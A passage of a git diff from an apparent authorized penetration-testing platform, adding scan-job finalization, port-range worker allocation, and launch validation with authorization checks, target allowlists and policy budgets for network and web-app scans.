owner._count_all_findings(report) + worker_metas[addr] = WorkerReportMeta( + report_cid=workers[addr].get("report_cid", ""), + start_port=report.get("start_port", 0), + end_port=report.get("end_port", 0), + ports_scanned=report.get("ports_scanned", 0), + open_ports=report.get("open_ports", []), + nr_findings=nr_findings, + node_ip=report.get("node_ip", ""), + ).to_dict() + + aggregated_report_cid = None + if aggregated: + aggregated_data = AggregatedScanData.from_dict(aggregated).to_dict() + aggregated_report_cid = artifacts.put_json(aggregated_data, show_logs=False) + if not aggregated_report_cid: + owner.P(f"Failed to store aggregated report for pass {job_pass} in R1FS", color='r') + continue + + redmesh_test_attestation = None + should_submit_attestation = True + if run_mode == RUN_MODE_CONTINUOUS_MONITORING: + last_attestation_at = job_specs.get("last_attestation_at") + min_interval = get_attestation_config(owner)["MIN_SECONDS_BETWEEN_SUBMITS"] + if last_attestation_at is not None and now_ts - last_attestation_at < min_interval: + elapsed = round(now_ts - last_attestation_at) + owner.P( + f"[ATTESTATION] Skipping test attestation for job {job_id}: " + f"last submitted {elapsed}s ago, min interval is {min_interval}s", + color='y' + ) + should_submit_attestation = False + + if should_submit_attestation: + try: + attestation_node_ips = [ + r.get("node_ip") for r in node_reports.values() + if r.get("node_ip") + ] + redmesh_test_attestation = owner._submit_redmesh_test_attestation( + job_id=job_id, + job_specs=job_specs, + workers=workers, + vulnerability_score=risk_score, + node_ips=attestation_node_ips, + report_cid=aggregated_report_cid, + ) + if redmesh_test_attestation is not None: + job_specs["last_attestation_at"] = now_ts + except Exception as exc: + import traceback + owner.P( + f"[ATTESTATION] Failed to submit test attestation for job {job_id}: {exc}\n" + f" Type: {type(exc).__name__}\n" + f" Args: {exc.args}\n" + f" Traceback:\n{traceback.format_exc()}", + color='r' + ) + + worker_scan_metrics = {} + for addr, report in node_reports.items(): + if report.get("scan_metrics"): + entry = {"scan_metrics": report["scan_metrics"]} + if report.get("thread_scan_metrics"): + entry["threads"] = report["thread_scan_metrics"] + worker_scan_metrics[addr] = entry + node_metrics = [e["scan_metrics"] for e in worker_scan_metrics.values()] + pass_metrics = None + if node_metrics: + pass_metrics = node_metrics[0] if len(node_metrics) == 1 else owner._merge_worker_metrics(node_metrics) + + pass_report = PassReport( + pass_nr=job_pass, + date_started=pass_date_started, + date_completed=pass_date_completed, + duration=round(pass_date_completed - pass_date_started, 2) if pass_date_started else 0, + aggregated_report_cid=aggregated_report_cid or "", + worker_reports=worker_metas, + risk_score=risk_score, + risk_breakdown=risk_result["breakdown"] if risk_result else None, + llm_analysis=llm_text, + quick_summary=summary_text, + llm_failed=llm_failed, + findings=flat_findings if flat_findings else None, + scan_metrics=pass_metrics, + worker_scan_metrics=worker_scan_metrics if worker_scan_metrics else None, + redmesh_test_attestation=redmesh_test_attestation, + ) + + pass_report_cid = artifacts.put_pass_report(pass_report, show_logs=False) + if not pass_report_cid: + owner.P(f"Failed to store pass report for pass {job_pass} in R1FS", color='r') + continue + + job_specs.setdefault("pass_reports", []).append( + PassReportRef(job_pass, pass_report_cid, risk_score).to_dict() + ) + + set_job_status(job_specs, JOB_STATUS_FINALIZING) + job_specs = _write_job_record(owner, job_key, job_specs, context="finalize_finalizing") + + if run_mode == RUN_MODE_SINGLEPASS: + set_job_status(job_specs, JOB_STATUS_FINALIZED) + owner._emit_timeline_event(job_specs, "scan_completed", "Scan completed") + if redmesh_test_attestation is not None: + owner._emit_timeline_event( + job_specs, "blockchain_submit", + "Job-finished attestation submitted", + actor_type="system", + meta={**redmesh_test_attestation, "network": owner.REDMESH_ATTESTATION_NETWORK} + ) + owner.P(f"[SINGLEPASS] Job {job_id} complete. Status set to FINALIZED.") + owner._emit_timeline_event(job_specs, "finalized", "Job finalized") + owner._build_job_archive(job_key, job_specs) + owner._clear_live_progress(job_id, list(workers.keys())) + continue + + if job_status == JOB_STATUS_SCHEDULED_FOR_STOP: + set_job_status(job_specs, JOB_STATUS_STOPPED) + owner._emit_timeline_event(job_specs, "scan_completed", f"Scan completed (pass {job_pass})") + if redmesh_test_attestation is not None: + owner._emit_timeline_event( + job_specs, "blockchain_submit", + f"Test attestation submitted (pass {job_pass})", + actor_type="system", + meta={**redmesh_test_attestation, "network": owner.REDMESH_ATTESTATION_NETWORK} + ) + owner.P(f"[CONTINUOUS] Pass {job_pass} complete for job {job_id}. Status set to STOPPED (soft stop was scheduled)") + owner._emit_timeline_event(job_specs, "stopped", "Job stopped") + owner._build_job_archive(job_key, job_specs) + owner._clear_live_progress(job_id, list(workers.keys())) + continue + + if job_pass >= MAX_CONTINUOUS_PASSES: + set_job_status(job_specs, JOB_STATUS_STOPPED) + owner._emit_timeline_event(job_specs, "scan_completed", f"Scan completed (pass {job_pass})") + owner._emit_timeline_event( + job_specs, + "pass_cap_reached", + f"Maximum continuous passes reached ({MAX_CONTINUOUS_PASSES})", + meta={"pass_nr": job_pass, "max_continuous_passes": MAX_CONTINUOUS_PASSES}, + ) + owner._log_audit_event("continuous_pass_cap_reached", { + "job_id": job_id, + "pass_nr": job_pass, + "max_continuous_passes": MAX_CONTINUOUS_PASSES, + }) + if redmesh_test_attestation is not None: + owner._emit_timeline_event( + job_specs, "blockchain_submit", + f"Test attestation submitted (pass {job_pass})", + actor_type="system", + meta={**redmesh_test_attestation, "network": owner.REDMESH_ATTESTATION_NETWORK} + ) + owner.P( + f"[CONTINUOUS] Pass {job_pass} complete for job {job_id}. " + f"Status set to STOPPED (max {MAX_CONTINUOUS_PASSES} passes reached)" + ) + owner._emit_timeline_event(job_specs, "stopped", "Job stopped") + owner._build_job_archive(job_key, job_specs) + owner._clear_live_progress(job_id, list(workers.keys())) + continue + + if redmesh_test_attestation is not None: + owner._emit_timeline_event( + job_specs, "blockchain_submit", + f"Test attestation submitted (pass {job_pass})", + actor_type="system", + meta={**redmesh_test_attestation, "network": owner.REDMESH_ATTESTATION_NETWORK} + ) + set_job_status(job_specs, JOB_STATUS_RUNNING) + interval = job_config.get("monitor_interval", owner.cfg_monitor_interval) + jitter = random.uniform(0, owner.cfg_monitor_jitter) + job_specs["next_pass_at"] = owner.time() + interval + jitter + owner._emit_timeline_event(job_specs, "pass_completed", f"Pass {job_pass} completed") + + owner.P(f"[CONTINUOUS] Pass {job_pass} complete for job {job_id}. Next pass in {interval}s (+{jitter:.1f}s jitter)") + _write_job_record(owner, job_key, job_specs, context="continuous_next_pass") + owner._clear_live_progress(job_id, list(workers.keys())) + + owner.completed_jobs_reports.pop(job_id, None) + if job_id in owner.lst_completed_jobs: + owner.lst_completed_jobs.remove(job_id) + + elif run_mode == RUN_MODE_CONTINUOUS_MONITORING and all_finished and next_pass_at and owner.time() >= next_pass_at: + job_specs["job_pass"] = job_pass + 1 + job_specs["next_pass_at"] = None + owner._emit_timeline_event(job_specs, "pass_started", f"Pass {job_pass + 1} started") + + for addr in workers: + workers[addr]["finished"] = False + workers[addr]["result"] = None + workers[addr]["report_cid"] = None + + _write_job_record(owner, job_key, job_specs, context="continuous_restart") + owner.P(f"[CONTINUOUS] Starting pass {job_pass + 1} for job {job_id}") diff --git a/extensions/business/cybersec/red_mesh/services/launch.py b/extensions/business/cybersec/red_mesh/services/launch.py new file mode 100644 index 00000000..9832d63c --- /dev/null +++ b/extensions/business/cybersec/red_mesh/services/launch.py @@ -0,0 +1,163 @@ +import random + +from ..constants import ( + PORT_ORDER_SEQUENTIAL, + PORT_ORDER_SHUFFLE, + ScanType, +) +from ..models import JobConfig +from .scan_strategy import get_scan_strategy + + +def _launch_network_jobs( + owner, + strategy, + *, + job_id, + target, + launcher, + start_port, + end_port, + job_config, + nr_local_workers_override=None, +): + exceptions = job_config.get("exceptions", []) + if not isinstance(exceptions, list): + exceptions = [] + port_order = job_config.get("port_order", owner.cfg_port_order) + excluded_features = job_config.get("excluded_features", owner.cfg_excluded_features) + enabled_features = job_config.get("enabled_features", []) + scan_min_delay = job_config.get("scan_min_delay", owner.cfg_scan_min_rnd_delay) + scan_max_delay = job_config.get("scan_max_delay", owner.cfg_scan_max_rnd_delay) + ics_safe_mode = job_config.get("ics_safe_mode", owner.cfg_ics_safe_mode) + scanner_identity = job_config.get("scanner_identity", owner.cfg_scanner_identity) + scanner_user_agent = job_config.get("scanner_user_agent", owner.cfg_scanner_user_agent) + workers_from_spec = job_config.get("nr_local_workers") + if nr_local_workers_override is not None: + workers_requested = nr_local_workers_override + elif workers_from_spec is not None and int(workers_from_spec) > 0: + workers_requested = int(workers_from_spec) + else: + workers_requested = owner.cfg_nr_local_workers + + owner.P("Using {} local workers for job {}".format(workers_requested, job_id)) + + ports = list(range(start_port, end_port + 1)) + batches = [] + if port_order == PORT_ORDER_SEQUENTIAL: + ports = sorted(ports) + else: + port_order = PORT_ORDER_SHUFFLE + random.shuffle(ports) + + nr_ports = len(ports) + if nr_ports == 0: + raise ValueError("No ports available for local workers.") + + workers_requested = max(1, min(workers_requested, nr_ports)) + base_chunk, remainder = divmod(nr_ports, workers_requested) + start_index = 0 + for index in range(workers_requested): + chunk = base_chunk + (1 if index < remainder else 0) + end_index = start_index + chunk + batch = ports[start_index:end_index] + if batch: + batches.append(batch) + start_index = end_index + + if not batches: + raise ValueError("Unable to allocate port batches to workers.") + + local_jobs = {} + for index, batch in enumerate(batches): + try: + owner.P("Launching {} requested by {} for target {} - {} ports. Port order {}".format( + job_id, launcher, target, len(batch), port_order + )) + batch_job = strategy.worker_cls( + owner=owner, + local_id_prefix=str(index + 1), + target=target, + job_id=job_id, + initiator=launcher, + exceptions=exceptions, + worker_target_ports=batch, + excluded_features=excluded_features, + enabled_features=enabled_features, + scan_min_delay=scan_min_delay, + scan_max_delay=scan_max_delay, + ics_safe_mode=ics_safe_mode, + scanner_identity=scanner_identity, + scanner_user_agent=scanner_user_agent, + ) + batch_job.start() + local_jobs[batch_job.local_worker_id] = batch_job + except Exception as exc: + owner.P( + "Failed to launch batch local job for ports [{}-{}]. Port order {}: {}".format( + min(batch) if batch else "-", + max(batch) if batch else "-", + port_order, + exc, + ), + color='r' + ) + + if not local_jobs: + raise ValueError("No local workers could be launched for the requested port range.") + return local_jobs + + +def _launch_webapp_job( + owner, + strategy, + *, + job_id, + launcher, + job_config, +): + job_config_obj = JobConfig.from_dict(job_config) + worker = strategy.worker_cls( + owner=owner, + job_id=job_id, + target_url=job_config_obj.target_url, + job_config=job_config_obj, + local_id="1", + initiator=launcher, + ) + worker.start() + return {worker.local_worker_id: worker} + + +def launch_local_jobs( + owner, + *, + job_id, + target, + launcher, + start_port, + end_port, + job_config, + nr_local_workers_override=None, +): + strategy = get_scan_strategy(job_config.get("scan_type", ScanType.NETWORK.value)) + if strategy.scan_type == ScanType.WEBAPP: + return _launch_webapp_job( + owner, + strategy, + job_id=job_id, + launcher=launcher, + job_config=job_config, + ) + + return _launch_network_jobs( + owner, + strategy, + job_id=job_id, + target=target, + launcher=launcher, + start_port=start_port, + end_port=end_port, + job_config=job_config, + nr_local_workers_override=nr_local_workers_override, + ) diff --git a/extensions/business/cybersec/red_mesh/services/launch_api.py b/extensions/business/cybersec/red_mesh/services/launch_api.py new file mode 100644 index 00000000..fa129e2e --- /dev/null +++ b/extensions/business/cybersec/red_mesh/services/launch_api.py @@ -0,0 +1,958 @@ +from copy import deepcopy +from urllib.parse import urlparse + +from ..constants import ( + DISTRIBUTION_MIRROR, + DISTRIBUTION_SLICE, + JOB_STATUS_RUNNING, + LOCAL_WORKERS_MAX, + LOCAL_WORKERS_MIN, + PORT_ORDER_SEQUENTIAL, + PORT_ORDER_SHUFFLE, + RUN_MODE_CONTINUOUS_MONITORING, + RUN_MODE_SINGLEPASS, + ScanType, +) +from ..models import CStoreJobRunning, JobConfig +from ..repositories import JobStateRepository +from .config import get_graybox_budgets_config +from .secrets import persist_job_config_with_secrets + + +def _job_repo(owner): + getter = getattr(type(owner), "_get_job_state_repository", None) + if callable(getter): + return getter(owner) + return JobStateRepository(owner) + + +def validation_error(message: str): + """Return a consistent validation error payload.""" + return {"error": "validation_error", "message": message} + + +def _normalize_allowlist(entries): + if not entries: + return [] + if not isinstance(entries, (str, list, tuple, set)): + return [] + if isinstance(entries, str): + entries = [entries] + normalized = [] + for entry in entries: + value = str(entry).strip() + if value: + normalized.append(value.lower()) + return normalized + + +def _split_allowlist_entries(entries): + hosts = [] + scopes = [] + for entry in _normalize_allowlist(entries): + if entry.startswith("/"): + scopes.append(entry) + continue + if "://" in entry: + parsed = urlparse(entry) + if parsed.hostname: + hosts.append(parsed.hostname.lower()) + if parsed.path and parsed.path != "/": + scopes.append(parsed.path.rstrip("/")) + continue + hosts.append(entry) + return hosts, scopes + + +def _host_in_allowlist(hostname: str, entries) -> bool: + hostname = (hostname or "").strip().lower() + if not hostname: + return False + hosts, _ = _split_allowlist_entries(entries) + if not hosts: + return True + return any(hostname == entry or hostname.endswith("." + entry) for entry in hosts) + + +def _scope_in_allowlist(scope_prefix: str, entries) -> bool: + _, scopes = _split_allowlist_entries(entries) + if not scopes: + return True + scope_prefix = (scope_prefix or "").strip() + if not scope_prefix: + return False + return any(scope_prefix.startswith(entry) for entry in scopes) + + +def _extract_scope_prefix(target_config) -> str: + if not isinstance(target_config, dict): + return "" + discovery = target_config.get("discovery") or {} + if not isinstance(discovery, dict): + return "" + return str(discovery.get("scope_prefix", "") or "") + + +def _extract_discovery_max_pages(target_config) -> int: + if not isinstance(target_config, dict): + return 50 + discovery = target_config.get("discovery") or {} + if not isinstance(discovery, dict): + return 50 + try: + return max(int(discovery.get("max_pages", 50) or 50), 1) + except (TypeError, ValueError): + return 50 + + +def _validate_authorization_context( + owner, + *, + target_host: str, + scan_type: str, + authorized: bool, + target_confirmation: str, + scope_id: str, + authorization_ref: str, + engagement_metadata, + target_allowlist, + target_config, +): + if not authorized: + return None, validation_error("Scan authorization required. Confirm you are authorized to scan this target.") + if engagement_metadata is not None and not isinstance(engagement_metadata, dict): + return None, validation_error("engagement_metadata must be a JSON object when provided") + + normalized_host = (target_host or "").strip().lower() + normalized_confirmation = (target_confirmation or "").strip().lower() + if normalized_confirmation and normalized_confirmation != normalized_host: + return None, validation_error( + f"target_confirmation must echo the resolved target host ({normalized_host})" + ) + + normalized_allowlist = _normalize_allowlist( + target_allowlist or getattr(owner, "cfg_scan_target_allowlist", []) + ) + if normalized_allowlist and not _host_in_allowlist(normalized_host, normalized_allowlist): + return None, validation_error( + f"Target {normalized_host} is outside the configured allowlist." + ) + + scope_prefix = _extract_scope_prefix(target_config) + if scan_type == ScanType.WEBAPP.value and scope_prefix and normalized_allowlist: + if not _scope_in_allowlist(scope_prefix, normalized_allowlist): + return None, validation_error( + f"Configured discovery scope {scope_prefix} is outside the configured allowlist." + ) + + return { + "target_confirmation": normalized_confirmation or normalized_host, + "scope_id": str(scope_id or "").strip(), + "authorization_ref": str(authorization_ref or "").strip(), + "engagement_metadata": deepcopy(engagement_metadata) if isinstance(engagement_metadata, dict) else None, + "target_allowlist": normalized_allowlist or None, + }, None + + +def _apply_launch_safety_policy( + owner, + *, + scan_type: str, + active_peers: list[str], + nr_local_workers: int, + scan_min_delay: float, + max_weak_attempts: int, + target_config, + allow_stateful_probes: bool, + verify_tls: bool, +): + warnings = [] + policy = {"scan_type": scan_type} + target_config_dict = deepcopy(target_config) if isinstance(target_config, dict) else target_config + + if scan_type == ScanType.NETWORK.value: + concurrency_budget = max(len(active_peers or []), 1) * max(int(nr_local_workers or 1), 1) + warning_threshold = max(int(getattr(owner, "cfg_network_concurrency_warning_threshold", 16) or 16), 1) + policy.update({ + "concurrency_budget": concurrency_budget, + "recommended_concurrency_budget": warning_threshold, + "scan_min_delay": scan_min_delay, + }) + if concurrency_budget > warning_threshold: + warnings.append( + f"Requested network concurrency {concurrency_budget} exceeds recommended threshold {warning_threshold}." + ) + policy["warnings"] = warnings + return max_weak_attempts, target_config_dict, allow_stateful_probes, policy + + graybox_budgets = get_graybox_budgets_config(owner) + auth_budget = graybox_budgets["AUTH_ATTEMPTS"] + discovery_budget = graybox_budgets["ROUTE_DISCOVERY"] + stateful_budget = graybox_budgets["STATEFUL_ACTIONS"] + + requested_attempts = max(int(max_weak_attempts or 0), 0) + effective_attempts = min(requested_attempts, auth_budget) + if requested_attempts > effective_attempts: + warnings.append( + f"max_weak_attempts capped from {requested_attempts} to policy budget {effective_attempts}." + ) + + requested_pages = _extract_discovery_max_pages(target_config_dict) + effective_pages = min(requested_pages, discovery_budget) + if isinstance(target_config_dict, dict): + discovery = dict(target_config_dict.get("discovery") or {}) + discovery["max_pages"] = effective_pages + target_config_dict["discovery"] = discovery + if requested_pages > effective_pages: + warnings.append( + f"discovery.max_pages capped from {requested_pages} to policy budget {effective_pages}." + ) + + effective_stateful = bool(allow_stateful_probes and stateful_budget > 0) + if allow_stateful_probes and not effective_stateful: + warnings.append("Stateful graybox probes were disabled by policy budget.") + elif effective_stateful: + warnings.append("Stateful graybox probes are enabled. Use only for explicitly approved workflows.") + + if not verify_tls: + warnings.append("TLS verification is disabled for an authenticated scan.") + + policy.update({ + "auth_attempt_budget": auth_budget, + "effective_auth_attempt_budget": effective_attempts, + "route_discovery_budget": discovery_budget, + "effective_route_discovery_budget": effective_pages, + "stateful_action_budget": stateful_budget, + "effective_stateful_action_budget": 1 if effective_stateful else 0, + "warnings": warnings, + }) + return effective_attempts, target_config_dict, effective_stateful, policy + + +def parse_exceptions(owner, exceptions): + """Normalize port-exception input to a list of ints.""" + if not exceptions: + return [] + if isinstance(exceptions, list): + return [int(x) for x in exceptions if str(x).isdigit()] + return [int(x) for x in owner.re.findall(r"\d+", str(exceptions)) if x.isdigit()] + + +def resolve_enabled_features(owner, excluded_features, scan_type=ScanType.NETWORK.value): + """Validate excluded features and derive enabled features for audit/config.""" + excluded_features = excluded_features or owner.cfg_excluded_features or [] + all_features = owner._get_all_features(scan_type=scan_type) + invalid = [f for f in excluded_features if f not in all_features] + if invalid: + owner.P(f"Warning: Unknown features in excluded_features (ignored): {owner.json_dumps(invalid)}") + excluded_features = [f for f in excluded_features if f in all_features] + enabled_features = [f for f in all_features if f not in excluded_features] + owner.P(f"Excluded features: {owner.json_dumps(excluded_features)}") + owner.P(f"Enabled features: {owner.json_dumps(enabled_features)}") + return excluded_features, enabled_features + + +def resolve_active_peers(owner, selected_peers): + """Validate selected peers against chainstore peers and return active peers.""" + chainstore_peers = owner.cfg_chainstore_peers + if not chainstore_peers: + return None, validation_error("No workers found in chainstore peers configuration.") + + if selected_peers and len(selected_peers) > 0: + invalid_peers = [p for p in selected_peers if p not in chainstore_peers] + if invalid_peers: + return None, validation_error( + f"Invalid peer addresses not found in chainstore_peers: {invalid_peers}. " + f"Available peers: {chainstore_peers}" + ) + return selected_peers, None + return chainstore_peers, None + + +def normalize_common_launch_options( + owner, + distribution_strategy, + port_order, + run_mode, + monitor_interval, + scan_min_delay, + scan_max_delay, + nr_local_workers, +): + """Apply defaults and bounds to common launch settings.""" + distribution_strategy = str(distribution_strategy).upper() + if not distribution_strategy or distribution_strategy not in [DISTRIBUTION_MIRROR, DISTRIBUTION_SLICE]: + distribution_strategy = owner.cfg_distribution_strategy + + port_order = str(port_order).upper() + if not port_order or port_order not in [PORT_ORDER_SHUFFLE, PORT_ORDER_SEQUENTIAL]: + port_order = owner.cfg_port_order + + run_mode = str(run_mode).upper() + if not run_mode or run_mode not in [RUN_MODE_SINGLEPASS, RUN_MODE_CONTINUOUS_MONITORING]: + run_mode = owner.cfg_run_mode + if monitor_interval <= 0: + monitor_interval = owner.cfg_monitor_interval + + if scan_min_delay <= 0: + scan_min_delay = owner.cfg_scan_min_rnd_delay + if scan_max_delay <= 0: + scan_max_delay = owner.cfg_scan_max_rnd_delay + if scan_min_delay > scan_max_delay: + scan_min_delay, scan_max_delay = scan_max_delay, scan_min_delay + + nr_local_workers = int(nr_local_workers) + if nr_local_workers <= 0: + nr_local_workers = owner.cfg_nr_local_workers + nr_local_workers = max(LOCAL_WORKERS_MIN, min(LOCAL_WORKERS_MAX, nr_local_workers)) + + return { + "distribution_strategy": distribution_strategy, + "port_order": port_order, + "run_mode": run_mode, + "monitor_interval": monitor_interval, + "scan_min_delay": scan_min_delay, + "scan_max_delay": scan_max_delay, + "nr_local_workers": nr_local_workers, + } + + +def build_network_workers(owner, active_peers, start_port, end_port, distribution_strategy): + """Build peer assignments for network scans.""" + num_workers = len(active_peers) + if num_workers == 0: + return None, validation_error("No workers available for job execution.") + + workers = {} + if distribution_strategy == DISTRIBUTION_MIRROR: + for address in active_peers: + workers[address] = { + "start_port": start_port, + "end_port": end_port, + "finished": False, + "result": None, + } + return workers, None + + total_ports = end_port - start_port + 1 + base_ports_count = total_ports // num_workers + rem_ports_count = total_ports % num_workers + current_start = start_port + for i, address in enumerate(active_peers): + size = base_ports_count + 1 if i < rem_ports_count else base_ports_count + current_end = current_start + size - 1 + workers[address] = { + "start_port": current_start, + "end_port": current_end, + "finished": False, + "result": None, + } + current_start = current_end + 1 + return workers, None + + +def build_webapp_workers(owner, active_peers, target_port): + """Build peer assignments for webapp scans. Every peer gets the same target.""" + if not active_peers: + return None, validation_error("No workers available for job execution.") + workers = {} + for address in active_peers: + workers[address] = { + "start_port": target_port, + "end_port": target_port, + "finished": False, + "result": None, + } + return workers, None + + +def announce_launch( + owner, + *, + target, + start_port, + end_port, + exceptions, + distribution_strategy, + port_order, + excluded_features, + run_mode, + monitor_interval, + scan_min_delay, + scan_max_delay, + task_name, + task_description, + active_peers, + workers, + redact_credentials, + ics_safe_mode, + scanner_identity, + scanner_user_agent, + created_by_name, + created_by_id, + nr_local_workers, + scan_type, + target_url, + official_username, + official_password, + regular_username, + regular_password, + weak_candidates, + max_weak_attempts, + app_routes, + verify_tls, + target_config, + allow_stateful_probes, + target_confirmation, + scope_id, + authorization_ref, + engagement_metadata, + target_allowlist, + safety_policy, +): + """Persist immutable config, announce job in CStore, and return launch response.""" + excluded_features, enabled_features = resolve_enabled_features( + owner, + excluded_features, + scan_type=scan_type, + ) + + if not scanner_identity: + scanner_identity = owner.cfg_scanner_identity + if not scanner_user_agent: + scanner_user_agent = owner.cfg_scanner_user_agent + + job_id = owner.uuid(8) + owner.P(f"Launching {job_id=} {target=} with {exceptions=}") + owner.P(f"Announcing pentest to workers (instance_id {owner.cfg_instance_id})...") + + job_config = JobConfig( + target=target, + start_port=start_port, + end_port=end_port, + exceptions=exceptions, + distribution_strategy=distribution_strategy, + port_order=port_order, + nr_local_workers=nr_local_workers, + enabled_features=enabled_features, + excluded_features=excluded_features, + run_mode=run_mode, + scan_min_delay=scan_min_delay, + scan_max_delay=scan_max_delay, + ics_safe_mode=ics_safe_mode, + redact_credentials=redact_credentials, + scanner_identity=scanner_identity, + scanner_user_agent=scanner_user_agent, + task_name=task_name, + task_description=task_description, + monitor_interval=monitor_interval, + selected_peers=active_peers, + created_by_name=created_by_name or "", + created_by_id=created_by_id or "", + authorized=True, + target_confirmation=target_confirmation, + scope_id=scope_id, + authorization_ref=authorization_ref, + engagement_metadata=engagement_metadata, + target_allowlist=target_allowlist, + safety_policy=safety_policy, + scan_type=scan_type, + target_url=target_url, + official_username=official_username, + official_password=official_password, + regular_username=regular_username, + regular_password=regular_password, + weak_candidates=weak_candidates, + max_weak_attempts=max_weak_attempts, + app_routes=app_routes, + verify_tls=verify_tls, + target_config=target_config, + allow_stateful_probes=allow_stateful_probes, + ) + + persisted_config, job_config_cid = persist_job_config_with_secrets( + owner, + job_id=job_id, + config_dict=job_config.to_dict(), + ) + if not job_config_cid: + owner.P("Failed to store job config in R1FS — aborting launch", color='r') + return {"error": "Failed to store job config in R1FS"} + + job_specs = CStoreJobRunning( + job_id=job_id, + job_status=JOB_STATUS_RUNNING, + job_pass=1, + run_mode=run_mode, + launcher=owner.ee_addr, + launcher_alias=owner.ee_id, + target=target, + scan_type=scan_type, + target_url=target_url, + task_name=task_name, + start_port=start_port, + end_port=end_port, + date_created=owner.time(), + job_config_cid=job_config_cid, + workers=workers, + timeline=[], + pass_reports=[], + next_pass_at=None, + risk_score=0, + ).to_dict() + owner._emit_timeline_event( + job_specs, "created", + f"Job created by {created_by_name}", + actor=created_by_name, + actor_type="user" + ) + owner._emit_timeline_event(job_specs, "started", "Scan started", actor=owner.ee_id, actor_type="node") + + try: + redmesh_job_start_attestation = owner._submit_redmesh_job_start_attestation( + job_id=job_id, + job_specs=job_specs, + workers=workers, + ) + if redmesh_job_start_attestation is not None: + job_specs["redmesh_job_start_attestation"] = redmesh_job_start_attestation + owner._emit_timeline_event( + job_specs, "blockchain_submit", + "Job-start attestation submitted", + actor_type="system", + meta={**redmesh_job_start_attestation, "network": owner.REDMESH_ATTESTATION_NETWORK} + ) + except Exception as exc: + import traceback + owner.P( + f"[ATTESTATION] Failed to submit job-start attestation for job {job_id}: {exc}\n" + f" Type: {type(exc).__name__}\n" + f" Args: {exc.args}\n" + f" Traceback:\n{traceback.format_exc()}", + color='r' + ) + + write_job_record = getattr(type(owner), "_write_job_record", None) + if callable(write_job_record): + write_job_record(owner, job_id, job_specs, context="launch_test") + else: + _job_repo(owner).put_job(job_id, job_specs) + + owner._log_audit_event("scan_launched", { + "job_id": job_id, + "target": target, + "start_port": start_port, + "end_port": end_port, + "launcher": owner.ee_addr, + "enabled_features_count": len(enabled_features), + "redact_credentials": redact_credentials, + "ics_safe_mode": ics_safe_mode, + "scope_id": scope_id, + "authorization_ref": authorization_ref, + "has_target_allowlist": bool(target_allowlist), + "safety_warning_count": len((safety_policy or {}).get("warnings", [])), + }) + + all_network_jobs = _job_repo(owner).list_jobs() + report = {} + for other_key, other_spec in all_network_jobs.items(): + normalized_key, normalized_spec = owner._normalize_job_record(other_key, other_spec) + if normalized_key and normalized_key != job_id: + report[normalized_key] = normalized_spec + + owner.P(f"Current jobs:\n{owner.json_dumps(all_network_jobs, indent=2)}") + return { + "job_specs": job_specs, + "worker": owner.ee_addr, + "other_jobs": report, + "job_config": persisted_config, + } + + +def launch_network_scan( + owner, + *, + target="", + start_port=1, + end_port=65535, + exceptions="64297", + distribution_strategy="", + port_order="", + excluded_features=None, + run_mode="", + monitor_interval=0, + scan_min_delay=0.0, + scan_max_delay=0.0, + task_name="", + task_description="", + selected_peers=None, + redact_credentials=True, + ics_safe_mode=True, + scanner_identity="", + scanner_user_agent="", + authorized=False, + created_by_name="", + created_by_id="", + nr_local_workers=0, + target_confirmation="", + scope_id="", + authorization_ref="", + engagement_metadata=None, + target_allowlist=None, +): + """Launch a network scan using network-specific validation and worker slicing.""" + if not target: + return validation_error("target required for network scan") + + start_port = int(start_port) + end_port = int(end_port) + if start_port > end_port: + return validation_error("start_port must be less than end_port") + + options = normalize_common_launch_options( + owner, + distribution_strategy=distribution_strategy, + port_order=port_order, + run_mode=run_mode, + monitor_interval=monitor_interval, + scan_min_delay=scan_min_delay, + scan_max_delay=scan_max_delay, + nr_local_workers=nr_local_workers, + ) + active_peers, peer_error = resolve_active_peers(owner, selected_peers) + if peer_error: + return peer_error + + authorization_context, auth_error = _validate_authorization_context( + owner, + target_host=target, + scan_type=ScanType.NETWORK.value, + authorized=authorized, + target_confirmation=target_confirmation, + scope_id=scope_id, + authorization_ref=authorization_ref, + engagement_metadata=engagement_metadata, + target_allowlist=target_allowlist, + target_config=None, + ) + if auth_error: + return auth_error + + max_weak_attempts, target_config, allow_stateful_probes, safety_policy = _apply_launch_safety_policy( + owner, + scan_type=ScanType.NETWORK.value, + active_peers=active_peers, + nr_local_workers=options["nr_local_workers"], + scan_min_delay=options["scan_min_delay"], + max_weak_attempts=5, + target_config=None, + allow_stateful_probes=False, + verify_tls=True, + ) + + workers, worker_error = build_network_workers( + owner, + active_peers, + start_port, + end_port, + options["distribution_strategy"], + ) + if worker_error: + return worker_error + + return announce_launch( + owner, + target=target, + start_port=start_port, + end_port=end_port, + exceptions=parse_exceptions(owner, exceptions), + distribution_strategy=options["distribution_strategy"], + port_order=options["port_order"], + excluded_features=excluded_features, + run_mode=options["run_mode"], + monitor_interval=options["monitor_interval"], + scan_min_delay=options["scan_min_delay"], + scan_max_delay=options["scan_max_delay"], + task_name=task_name, + task_description=task_description, + active_peers=active_peers, + workers=workers, + redact_credentials=redact_credentials, + ics_safe_mode=ics_safe_mode, + scanner_identity=scanner_identity, + scanner_user_agent=scanner_user_agent, + created_by_name=created_by_name, + created_by_id=created_by_id, + nr_local_workers=options["nr_local_workers"], + scan_type=ScanType.NETWORK.value, + target_url="", + official_username="", + official_password="", + regular_username="", + regular_password="", + weak_candidates=None, + max_weak_attempts=5, + app_routes=None, + verify_tls=True, + target_config=None, + allow_stateful_probes=False, + target_confirmation=authorization_context["target_confirmation"], + scope_id=authorization_context["scope_id"], + authorization_ref=authorization_context["authorization_ref"], + engagement_metadata=authorization_context["engagement_metadata"], + target_allowlist=authorization_context["target_allowlist"], + safety_policy=safety_policy, + ) + + +def launch_webapp_scan( + owner, + *, + target_url="", + excluded_features=None, + run_mode="", + monitor_interval=0, + scan_min_delay=0.0, + scan_max_delay=0.0, + task_name="", + task_description="", + selected_peers=None, + redact_credentials=True, + ics_safe_mode=True, + scanner_identity="", + scanner_user_agent="", + authorized=False, + created_by_name="", + created_by_id="", + official_username="", + official_password="", + regular_username="", + regular_password="", + weak_candidates=None, + max_weak_attempts=5, + app_routes=None, + verify_tls=True, + target_config=None, + allow_stateful_probes=False, + target_confirmation="", + scope_id="", + authorization_ref="", + engagement_metadata=None, + target_allowlist=None, +): + """Launch a graybox webapp scan using webapp-specific validation and mirrored worker assignment.""" + if not target_url: + return validation_error("target_url required for webapp scan") + if not official_username or not official_password: + return validation_error("official credentials required for webapp scan") + + parsed = urlparse(target_url) + if parsed.scheme not in ("http", "https") or not parsed.hostname: + return validation_error("target_url must be a valid http/https URL") + + target = parsed.hostname + target_port = parsed.port or (443 if parsed.scheme 